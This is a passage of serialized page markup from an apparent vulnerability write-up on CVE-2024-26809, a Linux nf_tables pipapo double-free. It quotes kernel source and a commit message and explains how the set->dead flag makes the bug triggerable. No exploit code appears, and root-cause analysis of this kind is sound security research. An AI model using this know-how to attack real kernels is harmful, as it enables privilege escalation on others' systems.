[4]\n",{"type":25,"tag":216,"props":57073,"children":57074},{"class":6922,"line":7275},[57075,57079],{"type":25,"tag":216,"props":57076,"children":57077},{"style":6973},[57078],{"type":31,"value":55459},{"type":25,"tag":216,"props":57080,"children":57081},{"style":6964},[57082],{"type":31,"value":6967},{"type":25,"tag":216,"props":57084,"children":57085},{"class":6922,"line":7296},[57086],{"type":25,"tag":216,"props":57087,"children":57088},{"emptyLinePlaceholder":16},[57089],{"type":31,"value":7642},{"type":25,"tag":216,"props":57091,"children":57092},{"class":6922,"line":7305},[57093,57098,57102,57106,57110,57114,57119],{"type":25,"tag":216,"props":57094,"children":57095},{"style":6947},[57096],{"type":31,"value":57097},"  set",{"type":25,"tag":216,"props":57099,"children":57100},{"style":6964},[57101],{"type":31,"value":17714},{"type":25,"tag":216,"props":57103,"children":57104},{"style":6947},[57105],{"type":31,"value":56638},{"type":25,"tag":216,"props":57107,"children":57108},{"style":6964},[57109],{"type":31,"value":17714},{"type":25,"tag":216,"props":57111,"children":57112},{"style":7047},[57113],{"type":31,"value":56647},{"type":25,"tag":216,"props":57115,"children":57116},{"style":6964},[57117],{"type":31,"value":57118},"(set);",{"type":25,"tag":216,"props":57120,"children":57121},{"style":6927},[57122],{"type":31,"value":57123}," // [5]\n",{"type":25,"tag":216,"props":57125,"children":57126},{"class":6922,"line":7557},[57127],{"type":25,"tag":216,"props":57128,"children":57129},{"style":6964},[57130],{"type":31,"value":13552},{"type":25,"tag":216,"props":57132,"children":57133},{"class":6922,"line":7574},[57134],{"type":25,"tag":216,"props":57135,"children":57136},{"style":6964},[57137],{"type":31,"value":7874},{"type":25,"tag":38,"props":57139,"children":57140},{},[57141,57143,57149,57151,57156,57157,57162],{"type":31,"value":57142},"Later on, the ",{"type":25,"tag":82,"props":57144,"children":57146},{"className":57145},[],[57147],{"type":31,"value":57148},"nf_tables_commit_release()",{"type":31,"value":57150}," function is called to free any objects that were marked for release, and eventually calls the ",{"type":25,"tag":82,"props":57152,"children":57154},{"className":57153},[],[57155],{"type":31,"value":54988},{"type":31,"value":56307},{"type":25,"tag":82,"props":57158,"children":57160},{"className":57159},[],[57161],{"type":31,"value":56321},{"type":31,"value":57163}," method.",{"type":25,"tag":206,"props":57165,"children":57167},{"className":20473,"code":57166,"language":2254,"meta":7,"style":7},"static void nf_tables_commit_release(struct net *net)\n{\n[...]\n schedule_work(&trans_destroy_work);\n[...]\n}\n[...]\nstatic void nf_tables_trans_destroy_work(struct work_struct *w)\n{\n[...]\n list_for_each_entry_safe(trans, next, &head, list) {\n  nft_trans_list_del(trans);\n  nft_commit_release(trans);\n }\n}\n[...]\nstatic void nft_commit_release(struct nft_trans *trans)\n{\n switch (trans->msg_type) {\n[...]\n case NFT_MSG_DELSET:\n case NFT_MSG_DESTROYSET:\n  nft_set_destroy(&trans->ctx, nft_trans_set(trans));\n[...]\n}\n[...]\nstatic void nft_set_destroy(const struct nft_ctx *ctx, struct nft_set *set)\n{\n[...]\n set->ops->destroy(ctx, set);\n[...]\n}\n",[57168],{"type":25,"tag":82,"props":57169,"children":57170},{"__ignoreMap":7},[57171,57210,57217,57224,57245,57252,57259,57266,57307,57314,57321,57342,57355,57367,57374,57381,57388,57429,57436,57464,57471,57484,57496,57537,57544,57551,57558,57616,57623,57630,57659,57666],{"type":25,"tag":216,"props":57172,"children":57173},{"class":6922,"line":6923},[57174,57178,57182,57186,57190,57194,57198,57202,57206],{"type":25,"tag":216,"props":57175,"children":57176},{"style":6936},[57177],{"type":31,"value":55013},{"type":25,"tag":216,"props":57179,"children":57180},{"style":6936},[57181],{"type":31,"value":55018},{"type":25,"tag":216,"props":57183,"children":57184},{"style":7047},[57185],{"type":31,"value":56814},{"type":25,"tag":216,"props":57187,"children":57188},{"style":6964},[57189],{"type":31,"value":1850},{"type":25,"tag":216,"props":57191,"children":57192},{"style":6936},[57193],{"type":31,"value":13357},{"type":25,"tag":216,"props":57195,"children":57196},{"style":6964},[57197],{"type":31,"value":55970},{"type":25,"tag":216,"props":57199,"children":57200},{"style":6953},[57201],{"type":31,"value":8519},{"type":25,"tag":216,"props":57203,"children":57204},{"style":6947},[57205],{"type":31,"value":55979},{"type":25,"tag":216,"props":57207,"children":57208},{"style":6964},[57209],{"type":31,"value":7107},{"type":25,"tag":216,"props":57211,"children":57212},{"class":6922,"line":6769},[57213],{"type":25,"tag":216,"props":57214,"children":57215},{"style":6964},[57216],{"type":31,"value":14836},{"type":25,"tag":216,"props":57218,"children":57219},{"class":6922,"line":6778},[57220],{"type":25,"tag":216,"props":57221,"children":57222},{"style":6964},[57223],{"type":31,"value":14275},{"type":25,"tag":216,"props":57225,"children":57226},{"class":6922,"line":7005},[57227,57232,57236,57240],{"type":25,"tag":216,"props":57228,"children":57229},{"style":7047},[57230],{"type":31,"value":57231}," schedule_work",{"type":25,"tag":216,"props":57233,"children":57234},{"style":6964},[57235],{"type":31,"value":1850},{"type":25,"tag":216,"props":57237,"children":57238},{"style":6953},[57239],{"type":31,"value":7059},{"type":25,"tag":216,"props":57241,"children":57242},{"style":6964},[57243],{"type":31,"value":57244},"trans_destroy_work);\n",{"type":25,"tag":216,"props":57246,"children":57247},{"class":6922,"line":7110},[57248],{"type":25,"tag":216,"props":57249,"children":57250},{"style":6964},[57251],{"type":31,"value":14275},{"type":25,"tag":216,"props":57253,"children":57254},{"class":6922,"line":7216},[57255],{"type":25,"tag":216,"props":57256,"children":57257},{"style":6964},[57258],{"type":31,"value":7874},{"type":25,"tag":216,"props":57260,"children":57261},{"class":6922,"line":7244},[57262],{"type":25,"tag":216,"props":57263,"children":57264},{"style":6964},[57265],{"type":31,"value":14275},{"type":25,"tag":216,"props":57267,"children":57268},{"class":6922,"line":7257},[57269,57273,57277,57282,57286,57290,57295,57299,57303],{"type":25,"tag":216,"props":57270,"children":57271},{"style":6936},[57272],{"type":31,"value":55013},{"type":25,"tag":216,"props":57274,"children":57275},{"style":6936},[57276],{"type":31,"value":55018},{"type":25,"tag":216,"props":57278,"children":57279},{"style":7047},[57280],{"type":31,"value":57281}," nf_tables_trans_destroy_work",{"type":25,"tag":216,"props":57283,"children":57284},{"style":6964},[57285],{"type":31,"value":1850},{"type":25,"tag":216,"props":57287,"children":57288},{"style":6936},[57289],{"type":31,"value":13357},{"type":25,"tag":216,"props":57291,"children":57292},{"style":6964},[57293],{"type":31,"value":57294}," work_struct ",{"type":25,"tag":216,"props":57296,"children":57297},{"style":6953},[57298],{"type":31,"value":8519},{"type":25,"tag":216,"props":57300,"children":57301},{"style":6947},[57302],{"type":31,"value":2470},{"type":25,"tag":216,"props":57304,"children":57305},{"style":6964},[57306],{"type":31,"value":7107},{"type":25,"tag":216,"props":57308,"children":57309},{"class":6922,"line":7275},[57310],{"type":25,"tag":216,"props":57311,"children":57312},{"style":6964},[57313],{"type":31,"value":14836},{"type":25,"tag":216,"props":57315,"children":57316},{"class":6922,"line":7296},[57317],{"type":25,"tag":216,"props":57318,"children":57319},{"style":6964},[57320],{"type":31,"value":14275},{"type":25,"tag":216,"props":57322,"children":57323},{"class":6922,"line":7305},[57324,57328,57333,57337],{"type":25,"tag":216,"props":57325,"children":57326},{"style":7047},[57327],{"type":31,"value":56966},{"type":25,"tag":216,"props":57329,"children":57330},{"style":6964},[57331],{"type":31,"value":57332},"(trans, next, ",{"type":25,"tag":216,"props":57334,"children":57335},{"style":6953},[57336],{"type":31,"value":7059},{"type":25,"tag":216,"props":57338,"children":57339},{"style":6964},[57340],{"type":31,"value":57341},"head, list) {\n",{"type":25,"tag":216,"props":57343,"children":57344},{"class":6922,"line":7557},[57345,57350],{"type":25,"tag":216,"props":57346,"children":57347},{"style":7047},[57348],{"type":31,"value":57349},"  nft_trans_list_del",{"type":25,"tag":216,"props":57351,"children":57352},{"style":6964},[57353],{"type":31,"value":57354},"(trans);\n",{"type":25,"tag":216,"props":57356,"children":57357},{"class":6922,"line":7574},[57358,57363],{"type":25,"tag":216,"props":57359,"children":57360},{"style":7047},[57361],{"type":31,"value":57362},"  nft_commit_release",{"type":25,"tag":216,"props":57364,"children":57365},{"style":6964},[57366],{"type":31,"value":57354},{"type":25,"tag":216,"props":57368,"children":57369},{"class":6922,"line":7591},[57370],{"type":25,"tag":216,"props":57371,"children":57372},{"style":6964},[57373],{"type":31,"value":13552},{"type":25,"tag":216,"props":57375,"children":57376},{"class":6922,"line":7604},[57377],{"type":25,"tag":216,"props":57378,"children":57379},{"style":6964},[57380],{"type":31,"value":7874},{"type":25,"tag":216,"props":57382,"children":57383},{"class":6922,"line":7613},[57384],{"type":25,"tag":216,"props":57385,"children":57386},{"style":6964},[57387],{"type":31,"value":14275},{"type":25,"tag":216,"props":57389,"children":57390},{"class":6922,"line":7636},[57391,57395,57399,57404,57408,57412,57417,57421,57425],{"type":25,"tag":216,"props":57392,"children":57393},{"style":6936},[57394],{"type":31,"value":55013},{"type":25,"tag":216,"props":57396,"children":57397},{"style":6936},[57398],{"type":31,"value":55018},{"type":25,"tag":216,"props":57400,"children":57401},{"style":7047},[57402],{"type":31,"value":57403}," nft_commit_release",{"type":25,"tag":216,"props":57405,"children":57406},{"style":6964},[57407],{"type":31,"value":1850},{"type":25,"tag":216,"props":57409,"children":57410},{"style":6936},[57411],{"type":31,"value":13357},{"type":25,"tag":216,"props":57413,"children":57414},{"style":6964},[57415],{"type":31,"value":57416}," nft_trans ",{"type":25,"tag":216,"props":57418,"children":57419},{"style":6953},[57420],{"type":31,"value":8519},{"type":25,"tag":216,"props":57422,"children":57423},{"style":6947},[57424],{"type":31,"value":56529},{"type":25,"tag":216,"props":57426,"children":57427},{"style":6964},[57428],{"type":31,"value":7107},{"type":25,"tag":216,"props":57430,"children":57431},{"class":6922,"line":7645},[57432],{"type":25,"tag":216,"props":57433,"children":57434},{"style":6964},[57435],{"type":31,"value":14836},{"type":25,"tag":216,"props":57437,"children":57438},{"class":6922,"line":7654},[57439,57444,57448,57452,57456,57460],{"type":25,"tag":216,"props":57440,"children":57441},{"style":6973},[57442],{"type":31,"value":57443}," switch",{"type":25,"tag":216,"props":57445,"children":57446},{"style":6964},[57447],{"type":31,"value":7016},{"type":25,"tag":216,"props":57449,"children":57450},{"style":6947},[57451],{"type":31,"value":56529},{"type":25,"tag":216,"props":57453,"children":57454},{"style":6964},[57455],{"type":31,"value":17714},{"type":25,"tag":216,"props":57457,"children":57458},{"style":6947},[57459],{"type":31,"value":56567},{"type":25,"tag":216,"props":57461,"children":57462},{"style":6964},[57463],{"type":31,"value":18761},{"type":25,"tag":216,"props":57465,"children":57466},{"class":6922,"line":7722},[57467],{"type":25,"tag":216,"props":57468,"children":57469},{"style":6964},[57470],{"type":31,"value":14275},{"type":25,"tag":216,"props":57472,"children":57473},{"class":6922,"line":7730},[57474,57479],{"type":25,"tag":216,"props":57475,"children":57476},{"style":6973},[57477],{"type":31,"value":57478}," case",{"type":25,"tag":216,"props":57480,"children":57481},{"style":6964},[57482],{"type":31,"value":57483}," NFT_MSG_DELSET:\n",{"type":25,"tag":216,"props":57485,"children":57486},{"class":6922,"line":7760},[57487,57491],{"type":25,"tag":216,"props":57488,"children":57489},{"style":6973},[57490],{"type":31,"value":57478},{"type":25,"tag":216,"props":57492,"children":57493},{"style":6964},[57494],{"type":31,"value":57495}," NFT_MSG_DESTROYSET:\n",{"type":25,"tag":216,"props":57497,"children":57498},{"class":6922,"line":7768},[57499,57504,57508,57512,57516,57520,57524,57528,57532],{"type":25,"tag":216,"props":57500,"children":57501},{"style":7047},[57502],{"type":31,"value":57503},"  nft_set_destroy",{"type":25,"tag":216,"props":57505,"children":57506},{"style":6964},[57507],{"type":31,"value":1850},{"type":25,"tag":216,"props":57509,"children":57510},{"style":6953},[57511],{"type":31,"value":7059},{"type":25,"tag":216,"props":57513,"children":57514},{"style":6964},[57515],{"type":31,"value":56529},{"type":25,"tag":216,"props":57517,"children":57518},{"style":6953},[57519],{"type":31,"value":17714},{"type":25,"tag":216,"props":57521,"children":57522},{"style":6947},[57523],{"type":31,"value":24240},{"type":25,"tag":216,"props":57525,"children":57526},{"style":6964},[57527],{"type":31,"value":7026},{"type":25,"tag":216,"props":57529,"children":57530},{"style":7047},[57531],{"type":31,"value":56495},{"type":25,"tag":216,"props":57533,"children":57534},{"style":6964},[57535],{"type":31,"value":57536},"(trans));\n",{"type":25,"tag":216,"props":57538,"children":57539},{"class":6922,"line":7800},[57540],{"type":25,"tag":216,"props":57541,"children":57542},{"style":6964},[57543],{"type":31,"value":14275},{"type":25,"tag":216,"props":57545,"children":57546},{"class":6922,"line":7808},[57547],{"type":25,"tag":216,"props":57548,"children":57549},{"style":6964},[57550],{"type":31,"value":7874},{"type":25,"tag":216,"props":57552,"children":57553},{"class":6922,"line":7868},[57554],{"type":25,"tag":216,"props":57555,"children":57556},{"style":6964},[57557],{"type":31,"value":14275},{"type":25,"tag":216,"props":57559,"children":57560},{"class":6922,"line":13001},[57561,57565,57569,57574,57578,57582,57586,57590,57594,57599,57603,57607,57611],{"type":25,"tag":216,"props":57562,"children":57563},{"style":6936},[57564],{"type":31,"value":55013},{"type":25,"tag":216,"props":57566,"children":57567},{"style":6936},[57568],{"type":31,"value":55018},{"type":25,"tag":216,"props":57570,"children":57571},{"style":7047},[57572],{"type":31,"value":57573}," nft_set_destroy",{"type":25,"tag":216,"props":57575,"children":57576},{"style":6964},[57577],{"type":31,"value":1850},{"type":25,"tag":216,"props":57579,"children":57580},{"style":6936},[57581],{"type":31,"value":13611},{"type":25,"tag":216,"props":57583,"children":57584},{"style":6936},[57585],{"type":31,"value":25111},{"type":25,"tag":216,"props":57587,"children":57588},{"style":6964},[57589],{"type":31,"value":55040},{"type":25,"tag":216,"props":57591,"children":57592},{"style":6953},[57593],{"type":31,"value":8519},{"type":25,"tag":216,"props":57595,"children":57596},{"style":6964},[57597],{"type":31,"value":57598},"ctx, ",{"type":25,"tag":216,"props":57600,"children":57601},{"style":6936},[57602],{"type":31,"value":13357},{"type":25,"tag":216,"props":57604,"children":57605},{"style":6964},[57606],{"type":31,"value":55068},{"type":25,"tag":216,"props":57608,"children":57609},{"style":6953},[57610],{"type":31,"value":8519},{"type":25,"tag":216,"props":57612,"children":57613},{"style":6964},[57614],{"type":31,"value":57615},"set)\n",{"type":25,"tag":216,"props":57617,"children":57618},{"class":6922,"line":13019},[57619],{"type":25,"tag":216,"props":57620,"children":57621},{"style":6964},[57622],{"type":31,"value":14836},{"type":25,"tag":216,"props":57624,"children":57625},{"class":6922,"line":13064},[57626],{"type":25,"tag":216,"props":57627,"children":57628},{"style":6964},[57629],{"type":31,"value":14275},{"type":25,"tag":216,"props":57631,"children":57632},{"class":6922,"line":13170},[57633,57637,57641,57645,57649,57654],{"type":25,"tag":216,"props":57634,"children":57635},{"style":6947},[57636],{"type":31,"value":57054},{"type":25,"tag":216,"props":57638,"children":57639},{"style":6964},[57640],{"type":31,"value":17714},{"type":25,"tag":216,"props":57642,"children":57643},{"style":6947},[57644],{"type":31,"value":56638},{"type":25,"tag":216,"props":57646,"children":57647},{"style":6964},[57648],{"type":31,"value":17714},{"type":25,"tag":216,"props":57650,"children":57651},{"style":7047},[57652],{"type":31,"value":57653},"destroy",{"type":25,"tag":216,"props":57655,"children":57656},{"style":6964},[57657],{"type":31,"value":57658},"(ctx, set);\n",{"type":25,"tag":216,"props":57660,"children":57661},{"class":6922,"line":27455},[57662],{"type":25,"tag":216,"props":57663,"children":57664},{"style":6964},[57665],{"type":31,"value":14275},{"type":25,"tag":216,"props":57667,"children":57668},{"class":6922,"line":27490},[57669],{"type":25,"tag":216,"props":57670,"children":57671},{"style":6964},[57672],{"type":31,"value":7874},{"type":25,"tag":38,"props":57674,"children":57675},{},[57676,57678,57683,57685,57690,57692,57698,57700,57705,57707,57712,57714,57718,57720,57725,57726,57730,57732,57738],{"type":31,"value":57677},"It may appear as if it would be impossible to make ",{"type":25,"tag":82,"props":57679,"children":57681},{"className":57680},[],[57682],{"type":31,"value":54942},{"type":31,"value":57684}," true in the release step because the ",{"type":25,"tag":82,"props":57686,"children":57688},{"className":57687},[],[57689],{"type":31,"value":56313},{"type":31,"value":57691}," method is always invoked first...\nHowever, one last piece brings this bug to life: the ",{"type":25,"tag":82,"props":57693,"children":57695},{"className":57694},[],[57696],{"type":31,"value":57697},"set->dead",{"type":31,"value":57699}," flag. If a ",{"type":25,"tag":82,"props":57701,"children":57703},{"className":57702},[],[57704],{"type":31,"value":54988},{"type":31,"value":57706}," was marked for deletion, it receives the ",{"type":25,"tag":82,"props":57708,"children":57710},{"className":57709},[],[57711],{"type":31,"value":57697},{"type":31,"value":57713}," flag ",{"type":25,"tag":216,"props":57715,"children":57716},{},[57717],{"type":31,"value":331},{"type":31,"value":57719},". If this flag is set, then the commit path will skip any commitments to this ",{"type":25,"tag":82,"props":57721,"children":57723},{"className":57722},[],[57724],{"type":31,"value":54988},{"type":31,"value":10409},{"type":25,"tag":216,"props":57727,"children":57728},{},[57729],{"type":31,"value":21486},{"type":31,"value":57731},". This is extremely convenient for us and will allow us to trigger the double-free because the ",{"type":25,"tag":82,"props":57733,"children":57735},{"className":57734},[],[57736],{"type":31,"value":57737},"priv ->dirty",{"type":31,"value":57739}," flag is not cleared when it should have been.",{"type":25,"tag":26,"props":57741,"children":57743},{"id":57742},"tracing-the-guilty-commit",[57744],{"type":31,"value":57745},"Tracing the guilty commit",{"type":25,"tag":38,"props":57747,"children":57748},{},[57749,57751,57758,57760,57766,57768,57773,57775,57781],{"type":31,"value":57750},"The above scenario raises some interesting suppositions about how this vulnerability was introduced. See, any ",{"type":25,"tag":162,"props":57752,"children":57755},{"href":57753,"rel":57754},"https://ubuntu.com/security/CVE-2024-26809",[166],[57756],{"type":31,"value":57757},"advisories",{"type":31,"value":57759}," about this vulnerability will say it was introduced by this ",{"type":25,"tag":162,"props":57761,"children":57764},{"href":57762,"rel":57763},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9827a0e6e23bf43003cd3d5b7fb11baf59a35e1e",[166],[57765],{"type":31,"value":56647},{"type":31,"value":57767},", which sounds fair considering this added the weird code that frees twice in the same path. However, by checking the blame on the ",{"type":25,"tag":82,"props":57769,"children":57771},{"className":57770},[],[57772],{"type":31,"value":57697},{"type":31,"value":57774}," flag, which was what actually made this exploitable, we will learn that it was only introduced over a year after the commit above in this ",{"type":25,"tag":162,"props":57776,"children":57779},{"href":57777,"rel":57778},"https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=5f68718b34a531a556f2f50300ead2862278da26",[166],[57780],{"type":31,"value":56647},{"type":31,"value":179},{"type":25,"tag":38,"props":57783,"children":57784},{},[57785],{"type":31,"value":57786},"By reading the message of the first commit, we can finally understand why this code was added:",{"type":25,"tag":206,"props":57788,"children":57792},{"className":57789,"code":57790,"language":57791,"meta":7,"style":7},"language-txt shiki shiki-themes slack-dark","New elements that reside in the clone are not released in case that the\ntransaction is aborted.\n\n[16302.231754] ------------[ cut here ]------------\n[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[...]\n[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G        W         5.19.0-rc3+ #155\n[...]\n[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n[...]\n[16302.231917] Call Trace:\n[16302.231919]  \u003CTASK>\n[16302.231921]  __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n[16302.231934]  nf_tables_abort+0x30/0x50 [nf_tables]\n[16302.231946]  nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n[16302.231952]  ? __nla_validate_parse+0x48/0x190\n[16302.231959]  nfnetlink_rcv+0x110/0x129 [nfnetlink]\n[16302.231963]  netlink_unicast+0x211/0x340\n[16302.231969]  netlink_sendmsg+0x21e/0x460\n\nAdd nft_set_pipapo_match_destroy() helper function to release the\nelements in the lookup tables.\n\nStefano Brivio says: \"We additionally look for elements pointers in the\ncloned matching data if priv->dirty is set, because that means that\ncloned data might point to additional elements we did not commit to the\nworking copy yet (such as the abort path case, but perhaps not limited\nto it).\"\n\nFixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\nReviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\nSigned-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n","txt",[57793],{"type":25,"tag":82,"props":57794,"children":57795},{"__ignoreMap":7},[57796,57804,57812,57819,57827,57835,57842,57850,57857,57865,57873,57880,57888,57896,57904,57912,57920,57928,57936,57944,57952,57959,57967,57975,57982,57990,57998,58006,58014,58022,58029,58037,58045],{"type":25,"tag":216,"props":57797,"children":57798},{"class":6922,"line":6923},[57799],{"type":25,"tag":216,"props":57800,"children":57801},{},[57802],{"type":31,"value":57803},"New elements that reside in the clone are not released in case that the\n",{"type":25,"tag":216,"props":57805,"children":57806},{"class":6922,"line":6769},[57807],{"type":25,"tag":216,"props":57808,"children":57809},{},[57810],{"type":31,"value":57811},"transaction is aborted.\n",{"type":25,"tag":216,"props":57813,"children":57814},{"class":6922,"line":6778},[57815],{"type":25,"tag":216,"props":57816,"children":57817},{"emptyLinePlaceholder":16},[57818],{"type":31,"value":7642},{"type":25,"tag":216,"props":57820,"children":57821},{"class":6922,"line":7005},[57822],{"type":25,"tag":216,"props":57823,"children":57824},{},[57825],{"type":31,"value":57826},"[16302.231754] ------------[ cut here ]------------\n",{"type":25,"tag":216,"props":57828,"children":57829},{"class":6922,"line":7110},[57830],{"type":25,"tag":216,"props":57831,"children":57832},{},[57833],{"type":31,"value":57834},"[16302.231756] WARNING: CPU: 0 PID: 100509 at net/netfilter/nf_tables_api.c:1864 nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":25,"tag":216,"props":57836,"children":57837},{"class":6922,"line":7216},[57838],{"type":25,"tag":216,"props":57839,"children":57840},{},[57841],{"type":31,"value":14275},{"type":25,"tag":216,"props":57843,"children":57844},{"class":6922,"line":7244},[57845],{"type":25,"tag":216,"props":57846,"children":57847},{},[57848],{"type":31,"value":57849},"[16302.231882] CPU: 0 PID: 100509 Comm: nft Tainted: G        W         5.19.0-rc3+ #155\n",{"type":25,"tag":216,"props":57851,"children":57852},{"class":6922,"line":7257},[57853],{"type":25,"tag":216,"props":57854,"children":57855},{},[57856],{"type":31,"value":14275},{"type":25,"tag":216,"props":57858,"children":57859},{"class":6922,"line":7275},[57860],{"type":25,"tag":216,"props":57861,"children":57862},{},[57863],{"type":31,"value":57864},"[16302.231887] RIP: 0010:nf_tables_chain_destroy+0x26/0x127 [nf_tables]\n",{"type":25,"tag":216,"props":57866,"children":57867},{"class":6922,"line":7296},[57868],{"type":25,"tag":216,"props":57869,"children":57870},{},[57871],{"type":31,"value":57872},"[16302.231899] Code: f3 fe ff ff 41 55 41 54 55 53 48 8b 6f 10 48 89 fb 48 c7 c7 82 96 d9 a0 8b 55 50 48 8b 75 58 e8 de f5 92 e0 83 7d 50 00 74 09 \u003C0f> 0b 5b 5d 41 5c 41 5d c3 4c 8b 65 00 48 8b 7d 08 49 39 fc 74 05\n",{"type":25,"tag":216,"props":57874,"children":57875},{"class":6922,"line":7305},[57876],{"type":25,"tag":216,"props":57877,"children":57878},{},[57879],{"type":31,"value":14275},{"type":25,"tag":216,"props":57881,"children":57882},{"class":6922,"line":7557},[57883],{"type":25,"tag":216,"props":57884,"children":57885},{},[57886],{"type":31,"value":57887},"[16302.231917] Call Trace:\n",{"type":25,"tag":216,"props":57889,"children":57890},{"class":6922,"line":7574},[57891],{"type":25,"tag":216,"props":57892,"children":57893},{},[57894],{"type":31,"value":57895},"[16302.231919]  \u003CTASK>\n",{"type":25,"tag":216,"props":57897,"children":57898},{"class":6922,"line":7591},[57899],{"type":25,"tag":216,"props":57900,"children":57901},{},[57902],{"type":31,"value":57903},"[16302.231921]  __nf_tables_abort.cold+0x23/0x28 [nf_tables]\n",{"type":25,"tag":216,"props":57905,"children":57906},{"class":6922,"line":7604},[57907],{"type":25,"tag":216,"props":57908,"children":57909},{},[57910],{"type":31,"value":57911},"[16302.231934]  nf_tables_abort+0x30/0x50 [nf_tables]\n",{"type":25,"tag":216,"props":57913,"children":57914},{"class":6922,"line":7613},[57915],{"type":25,"tag":216,"props":57916,"children":57917},{},[57918],{"type":31,"value":57919},"[16302.231946]  nfnetlink_rcv_batch+0x41a/0x840 [nfnetlink]\n",{"type":25,"tag":216,"props":57921,"children":57922},{"class":6922,"line":7636},[57923],{"type":25,"tag":216,"props":57924,"children":57925},{},[57926],{"type":31,"value":57927},"[16302.231952]  ? __nla_validate_parse+0x48/0x190\n",{"type":25,"tag":216,"props":57929,"children":57930},{"class":6922,"line":7645},[57931],{"type":25,"tag":216,"props":57932,"children":57933},{},[57934],{"type":31,"value":57935},"[16302.231959]  nfnetlink_rcv+0x110/0x129 [nfnetlink]\n",{"type":25,"tag":216,"props":57937,"children":57938},{"class":6922,"line":7654},[57939],{"type":25,"tag":216,"props":57940,"children":57941},{},[57942],{"type":31,"value":57943},"[16302.231963]  netlink_unicast+0x211/0x340\n",{"type":25,"tag":216,"props":57945,"children":57946},{"class":6922,"line":7722},[57947],{"type":25,"tag":216,"props":57948,"children":57949},{},[57950],{"type":31,"value":57951},"[16302.231969]  netlink_sendmsg+0x21e/0x460\n",{"type":25,"tag":216,"props":57953,"children":57954},{"class":6922,"line":7730},[57955],{"type":25,"tag":216,"props":57956,"children":57957},{"emptyLinePlaceholder":16},[57958],{"type":31,"value":7642},{"type":25,"tag":216,"props":57960,"children":57961},{"class":6922,"line":7760},[57962],{"type":25,"tag":216,"props":57963,"children":57964},{},[57965],{"type":31,"value":57966},"Add nft_set_pipapo_match_destroy() helper function to release the\n",{"type":25,"tag":216,"props":57968,"children":57969},{"class":6922,"line":7768},[57970],{"type":25,"tag":216,"props":57971,"children":57972},{},[57973],{"type":31,"value":57974},"elements in the lookup tables.\n",{"type":25,"tag":216,"props":57976,"children":57977},{"class":6922,"line":7800},[57978],{"type":25,"tag":216,"props":57979,"children":57980},{"emptyLinePlaceholder":16},[57981],{"type":31,"value":7642},{"type":25,"tag":216,"props":57983,"children":57984},{"class":6922,"line":7808},[57985],{"type":25,"tag":216,"props":57986,"children":57987},{},[57988],{"type":31,"value":57989},"Stefano Brivio says: \"We additionally look for elements pointers in the\n",{"type":25,"tag":216,"props":57991,"children":57992},{"class":6922,"line":7868},[57993],{"type":25,"tag":216,"props":57994,"children":57995},{},[57996],{"type":31,"value":57997},"cloned matching data if priv->dirty is set, because that means that\n",{"type":25,"tag":216,"props":57999,"children":58000},{"class":6922,"line":13001},[58001],{"type":25,"tag":216,"props":58002,"children":58003},{},[58004],{"type":31,"value":58005},"cloned data might point to additional elements we did not commit to the\n",{"type":25,"tag":216,"props":58007,"children":58008},{"class":6922,"line":13019},[58009],{"type":25,"tag":216,"props":58010,"children":58011},{},[58012],{"type":31,"value":58013},"working copy yet (such as the abort path case, but perhaps not limited\n",{"type":25,"tag":216,"props":58015,"children":58016},{"class":6922,"line":13064},[58017],{"type":25,"tag":216,"props":58018,"children":58019},{},[58020],{"type":31,"value":58021},"to it).\"\n",{"type":25,"tag":216,"props":58023,"children":58024},{"class":6922,"line":13170},[58025],{"type":25,"tag":216,"props":58026,"children":58027},{"emptyLinePlaceholder":16},[58028],{"type":31,"value":7642},{"type":25,"tag":216,"props":58030,"children":58031},{"class":6922,"line":27455},[58032],{"type":25,"tag":216,"props":58033,"children":58034},{},[58035],{"type":31,"value":58036},"Fixes: 3c4287f62044 (\"nf_tables: Add set type for arbitrary concatenation of ranges\")\n",{"type":25,"tag":216,"props":58038,"children":58039},{"class":6922,"line":27490},[58040],{"type":25,"tag":216,"props":58041,"children":58042},{},[58043],{"type":31,"value":58044},"Reviewed-by: Stefano Brivio \u003Csbrivio@redhat.com>\n",{"type":25,"tag":216,"props":58046,"children":58047},{"class":6922,"line":27498},[58048],{"type":25,"tag":216,"props":58049,"children":58050},{},[58051],{"type":31,"value":58052},"Signed-off-by: Pablo Neira Ayuso \u003Cpablo@netfilter.org>\n",{"type":25,"tag":38,"props":58054,"children":58055},{},[58056,58058,58063,58065,58070,58072,58077,58079,58084],{"type":31,"value":58057},"As we previously discussed, committing changes to a pipapo ",{"type":25,"tag":82,"props":58059,"children":58061},{"className":58060},[],[58062],{"type":31,"value":54988},{"type":31,"value":58064}," is implemented by creating a clone of the match object, to which changes are made during the control plane. Later, if we enter the commit path, the changes are committed in the ",{"type":25,"tag":82,"props":58066,"children":58068},{"className":58067},[],[58069],{"type":31,"value":56313},{"type":31,"value":58071}," method by simply replacing the ",{"type":25,"tag":82,"props":58073,"children":58075},{"className":58074},[],[58076],{"type":31,"value":54988},{"type":31,"value":58078},"s match object with its updated clone. So checking the ",{"type":25,"tag":82,"props":58080,"children":58082},{"className":58081},[],[58083],{"type":31,"value":54942},{"type":31,"value":58085}," flag and then calling free again ensures we also free uncommitted changes.",{"type":25,"tag":38,"props":58087,"children":58088},{},[58089,58091,58096],{"type":31,"value":58090},"This doesn't make sense in the commit path but only in the abort path. Evidently, when aborting the transaction that creates the ",{"type":25,"tag":82,"props":58092,"children":58094},{"className":58093},[],[58095],{"type":31,"value":54988},{"type":31,"value":58097},", there will be no committed changes, and there will only be the elements inside the clone, which will end up never being committed. So, to make sure we free these 